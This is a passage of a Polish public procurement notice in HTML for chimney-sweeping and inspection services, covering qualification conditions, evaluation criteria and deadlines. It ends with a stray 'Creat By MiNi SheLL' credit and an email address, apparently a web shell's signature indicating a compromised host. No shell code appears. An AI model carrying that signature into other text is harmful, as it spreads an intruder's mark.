nieruchomościach objętych niniejszym zamówieniem; wymóg ten dotyczy osób świadczących pracę w zawodach takich jak kominiarze, czeladnicy kominiarscy, pomocnicy kominiarscy, pracownicy fizyczni/robotnicy niewykwalifikowani bezpośrednio świadczący pracę na nieruchomościach Zamawiającego itp. Sposób udokumentowania przez wykonawcę zatrudnienia tych osób na umowę o pracę, uprawnienia Zamawiającego w zakresie kontroli spełnienia wymagania tego wymogu, określenie kar umownych z tytułu wykonywania przez wykonawcę robót przez osoby niezatrudnione na umowę o pracę zostały określone we wzorze umowy stanowiącym część III SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 128758,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71632200-9 - Usługi badania nieinwazyjnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">90915000-4 - Usługi czyszczenia pieców i kominów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość powtórzenia przedmiotu zamówienia na okres kolejnych 3 miesięcy (wartość zamówienia - 25% wartości zamówienia podstawowego) . Zamawiający poinformuje pisemnie Wykonawcę, że skorzysta ze wznowienia w terminie do 31.12.2023 r. W przypadku niepoinformowania Wykonawcy w tym terminie, należy traktować, że Zamawiający nie będzie korzystał ze wznowienia. Wykonawca nie będzie miał żadnych roszczeń w stosunku do Zamawiającego, w przypadku gdy Zamawiający ze wznowienia nie skorzysta.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje badania oświadczeń stanowiących wstępne potwierdzenie, że na dzień składana ofert Wykonawca nie podlega wykluczeniu i spełnienia warunki udziału w postępowaniu. Następnie Zamawiający dokonuje oceny ofert, a następnie zbada, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie Wykonawcę , który przedstawił najkorzystniejszą ofertę do złożenia dokumentów potwierdzających spełnienie warunków udziału oraz niepodleganie wykluczeniu z postępowania art, 274 ustawy stosuje się. 2 ) w toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. 3) Zamawiający dokona poprawek w ofercie zgodnie z zapisami art. 223 ust 2 ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania dodatkowych usług kominiarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zamawiający wymaga, aby wykonawca spełniał następujące warunki udziału w postępowa-niu:<br/>1)	dla potwierdzenia przez wykonawcę zdolności do występowania w obrocie gospodar-czym wykonawca winien być wpisany do jednego z rejestrów zawodowych lub handlo-wych prowadzonym w kraju, w którym ma siedzibę w kraju lub miejscu zamieszkania. W przypadku podmiotów zarejestrowanych w Polsce winien być wpisany do Krajowego Rejestru Sądowego lub Centralnej Ewidencje i Informacja o Działalności Gospodarczej RP.<br/>2)	Dla potwierdzenia przez wykonawcę sytuacji ekonomicznej lub finansowej Zamawiający wymaga udokumentowania, iż: <br/>a)	w okresie ostatnich trzech lat obrotowych, a jeśli okres prowadzenia działalności jest krótszy – za ten okres, uzyskali obroty (przychód) w każdym z tych lat w wysokości brutto nie mniejszej niż:<br/>	BOM – 293.000,00 zł, <br/>	BOW – 82.000,00 ZŁ<br/>	W przypadku składania oferty na więcej niż jedną część zamówienia – Zamawiający wymaga udokumentowania obrotu (przychodu) w wysokości nie mniejszej niż wyni-kającej z zsumowania tych części, na które składa oferty.<br/>b)	jest ubezpieczony od odpowiedzialności cywilnej za wszelkie szkody powstałe w związku z prowadzoną działalnością gospodarczą związaną z przedmiotem zamówie-nia; ubezpieczenie ma obejmować szkody majątkowe, jak i niemajątkowe powstałe w związku z odpowiedzialnością deliktową wykonawcy; wysokość ubezpieczenia ma być nie mniejsza niż: <br/>	BOM – 293.000,00 zł, <br/>	BOW – 82.000,00 zł<br/>	W przypadku składania oferty na więcej niż jedną część zamówienia – Zamawiający wymaga udokumentowania ubezpieczenia, o którym mowa powyżej, w wysokości nie mniejszej niż wynikającej z zsumowania tych części, na które jego oferta jako naj-korzystniejsza zostanie wybrana przez Zamawiającego.<br/>3)	Dla potwierdzenia przez wykonawcę zdolności technicznej i zawodowej, tj. doświadcze-nia, kwalifikacji zawodowych oraz potencjału technicznego do wykonania zamówienia Zamawiający wymaga udokumentowania:<br/>a)	należytego wykonania lub wykonywania w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, trzech usług kominiarskich w zakresie objętym niniejszym zamówieniem, przy czym wartość każdej z tych zrealizowanych usług z tych lat nie może być niższa niż:<br/>	BOM – 293.000,00 zł, <br/>	BOW – 82.000,00 zł<br/>	W przypadku składania na więcej niż jedną część zamówienia – Zamawiający wyma-ga udokumentowania realizacji usług w wysokości nie mniejszej niż wynikającej z sumowania tych części, na które składa ofertę.<br/>b)	posiadania n/w narzędzi i urządzeń technicznych:<br/>	kompletu narzędzi do czyszczenia przewodów kominowych bez wkładów uszczelniających;<br/>	kompletu narzędzi do czyszczenia przewodów kominowych uszczelnionych wkładami;<br/>	przyrządu do pomiaru ciągu kominowego;<br/>	zapałek lub świec dymnych,<br/>	kamery inspekcyjnej<br/>	miernik ciśnienia w przewodzie kominowym<br/>	detektor tlenku węgla<br/>c)	dysponują osobami zdolnymi do wykonania zamówienia, tj. mają w dyspozycji osobę posiadającą uprawnienia do wykonywania prac i czynności objętych niniejszym za-mówieniem; osoba ta musi posiadać kwalifikacje mistrza kominiarskiego, wydane przez Izbę Rzemieślniczą lub przez Ministerstwo Edukacji Narodowej w zakresie przewodów grawitacyjnych: dymowych spalinowych i wentylacyjnych lub ma posia-dać uprawnienia budowlane odpowiedniej specjalności w odniesieniu do w/w prze-wodów kominowych i być pełnoprawnym członkiem właściwej Okręgowej Izby In-żynierów Budownictwa (art. 62 ust. 6 Ustawy z dnia 07.07.1994 r. Prawo budowlane z późn. zm.). Wykonawca będący osobą fizyczną lub będący wspólnikiem spółki cy-wilnej może osobiście spełniać w/w wymagania. Ilość osób w dyspozycji posiadają-cych w/w uprawnienia nie może być niższa niż:<br/>	BOM – trzy osoby, <br/>	BOW – dwie osoby<br/>W przypadku składania na więcej niż jedną część zamówienia – Zamawiający wyma-ga wykonawca dysponował osobami posiadającymi w/w kwalifikacje w ilości nie mniejszej niż wynikającej z sumowania tych części, na które składa ofertę.<br/>2.	Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wy-maganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wyko-nawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na re-alizację zamówienia.<br/>3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w niniejszym rozdziale, polegać na zdolnościach technicznych lub zawodo-wych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (art. 118 ustawy PZP). W tej sytuacji:<br/>1)	wykonawca zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, bę-dzie dysponował zasobami tych podmiotów winien złożyć wraz z ofertą pisemne zobo-wiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na po-trzeby realizacji zamówienia w zakresie określonym wzorem zobowiązania stanowiącego załącznik nr 8 do SWZ. <br/>2)	Zamawiający oceni, czy udostępniane wykonawcy przez trzecie podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wskazanie przez wykonawcę spełniania warunków udziału w postępowaniu określonych w Rozdziale 7, ust. 1 pkt 1, pkt 2 i pkt 3 oraz zbada, czy nie zachodzą wobec tego pod-miotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy (pod-miot na którego zasoby będzie powoływał się wykonawca nie może podlegać wyklucze-niu z przesłanek określonych w rozdziale 6 oraz będzie spełnić warunki odpowiednio do udzielonych zasobów wykonawcy).<br/>3)	w odniesieniu do warunków udziału w postępowaniu dotyczącym technicznej i zawodo-wej określonym w niniejszym rozdziale ust. 1 pkt 3 niniejszego rozdziału wykonawcy mogą polegać na zdolnościach innych podmiotów, jeżeli podmioty te będą wykonywać usługi kominiarskie, do realizacji których te zdolności są wymagane (jako podwykonaw-cy). <br/>4)	Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmio-tu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą, wobec tego podmiotu podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego za-stąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/>UWAGA:<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolno-ści lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępnia-jących zasoby.<br/>5)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostęp-niających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ust. 3 pkt. 1 niniejszego rozdziału, także oświadczenia podmiotu udostępniającego zasoby, potwier-dzające brak podstaw wykluczenia tego podmiotu oraz spełniania warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik nr 7 SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu z art. 108 ustawy PZP</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	oświadczenie o aktualności informacji zawartych w oświadczeniach z art. 125 ust. 1 ustawy PZP,<br/>b)	dokument dopuszczający do obrotu prawnego wykonawcę, jeżeli wykonawca w oświadczeniu o niepodleganiu wykluczeniu z postępowania i o spełnianiu warunków udziału w postępowaniu nie wskazał gdzie, zgodnie z ust. 5, można go bezpłatnie uzyskać,<br/>c)	dokument potwierdzający wysokość obrotów wskazanych w Nazwie i opisie warunków udziału w postępowaniu w ostatnich trzech latach obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (np. sprawozdanie finansowe w części dotyczącej obrotu, a jeżeli podlega ono badaniu przez firmę audytorską zgodnie z przepisami o rachunkowości, również odpowiednio ze sprawozdaniem z badania sprawozdania finansowego; w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających w szczególności przychody oraz aktywa i zobowiązania jeżeli okres prowadzenia działalności jest krótszy - za ten okres; lub oświadczenia wykonawcy o rocznych przychodach wykonawcy),<br/>d)	dokument potwierdzający posiadanie ubezpieczenia w zakresie i na kwotę wskazaną Nazwie i opisie warunków udziału w postępowaniu,<br/>e)	wykaz usług kominiarskich wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane (wzór Wykazu stanowi załącznik nr 10 SWZ), z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi kominiarskie były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. Jeżeli wykonawca wskaże w wykazie usługi kominiarskie wykonane dla Zamawiającego – nie jest zobowiązany dostarczać poświadczenia ich należytego wykonania. Ilości, wartości oraz wymagany zakres usług kominiarskich został określony w Nazwie i opisie warunków udziału w postępowaniu,<br/>f)	wykaz n/w narzędzi i urządzeń technicznych, spełniający wymagania określone w Nazwie i opisie warunków udziału w postępowaniu,<br/>g)	wykaz osób w dyspozycji posiadających kwalifikacje zawodowe określone w Nazwie i opisie warunków udziału w postępowaniu dysponują osobami zdolnymi do wykonania zamówienia, tj. mają w dyspozycji osobę.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie wymagane są przedmiotowe środki dowodowe <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzie-lenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Wymagane jest dołączenie do oferty pełnomocnictwa. Wszelka korespondencja wynikająca z niniejszej SWZ prowadzona będzie wyłącznie z pełnomoc-nikiem.<br/>2)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w lit. a., tj.:<br/>a)	wykonawcy występujący wspólnie muszą wykazać, iż łącznie spełniają warunki udziału w postępowaniu określone w rozdziale 7,<br/>b)	żaden z wykonawców nie może podlegać wykluczeniu z postępowania z przyczyn wyszczególnionych rozdziale 1 pkt 1; każdy z wykonawców winien złożyć oddzielne oświadczenia wymienione w rozdziale 6.<br/>3)	oferta winna być podpisana przez pełnomocnika,<br/>4)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawcy wspólnie ubie-gającego się o udzielenie zamówienia,<br/>5)	każdy z wykonawców ubiegających się o zamówienie wraz z ofertą składa oświadczenie o niepodleganiu wykluczaniu oraz oświadczenie o spełnieniu warunków udziału w postę-powaniu.<br/>6)	przypadku wybrania oferty wykonawców działających wspólnie – wykonawcy solidarnie będą odpowiadać za realizację umowy.<br/>7)	jeżeli oferta wykonawców działających wspólnie zostanie wybrana – Zamawiający zażą-da umowy regulującej współpracę tych wykonawców, która w jednoznaczny sposób określi zasady solidarnej odpowiedzialności za realizację niniejszego zamówienia oraz podziału obowiązków wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony zgodnie przewidują możliwość dokonania zmian w umowie w n/w przypadkach:<br/>1)	ustawowej zmiany stawki podatku VAT - rozliczenie nastąpi zgodnie z § 20 ust. 4,<br/>2)	zmiany podwykonawcy, na którego zasoby powoływał się Wykonawca; zmiana ta ma być dokonana zgodnie z § 19 ust. 6 umowy, (jeżeli dotyczy)<br/>3)	zmian dokonywanych na podstawie art. 144 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem formularza do złożenia, zmiany, wycofania oferty dostępnego na ePuap i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> termin rozpoczęcia realizacji zamówienia - od dnia podpisania umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com